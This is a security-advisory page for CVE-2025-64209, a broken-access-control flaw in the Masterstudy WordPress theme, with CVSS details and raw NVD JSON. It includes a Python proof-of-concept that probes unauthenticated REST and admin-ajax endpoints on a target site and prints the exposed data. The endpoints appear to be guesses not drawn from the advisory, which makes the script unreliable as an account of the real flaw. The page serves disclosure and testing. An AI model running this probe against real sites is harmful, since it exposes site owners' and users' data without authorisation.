Security Vulnerability Report
中文
CVE-2025-64209 CVSS 7.5 HIGH

CVE-2025-64209

Published: 2025-12-18 08:16:11
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in StylemixThemes Masterstudy masterstudy allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Masterstudy: from n/a through < 4.8.122.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Masterstudy主题 < 4.8.122

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64209 PoC - Masterstudy Theme Broken Access Control # Target: WordPress sites using Masterstudy theme < 4.8.122 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-64209 This PoC attempts to access protected endpoints without authentication """ # Common Masterstudy protected endpoints endpoints = [ '/wp-json/masterstudy/v1/settings', '/wp-json/masterstudy/v1/users', '/wp-json/masterstudy/v1/courses', '/wp-admin/admin-ajax.php?action=stm_lms_get_profile', '/wp-admin/admin-ajax.php?action=stm_lms_settings' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/json' } print(f'[*] Scanning target: {target_url}') print(f'[*] CVE-2025-64209: Masterstudy < 4.8.122 Broken Access Control') for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f'[+] VULNERABLE: {url}') print(f' Status: {response.status_code}') print(f' Response preview: {response.text[:200]}...') elif response.status_code == 401 or response.status_code == 403: print(f'[-] Protected: {endpoint}') else: print(f'[*] Unexpected response from {endpoint}: {response.status_code}') except requests.RequestException as e: print(f'[!] Error accessing {endpoint}: {str(e)}') print('[*] Scan complete') if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-64209.py <target_url>') print('Example: python cve-2025-64209.py https://example.com') sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64209", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:11.273", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in StylemixThemes Masterstudy masterstudy allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Masterstudy: from n/a through < 4.8.122."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/masterstudy/vulnerability/wordpress-masterstudy-theme-4-8-122-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}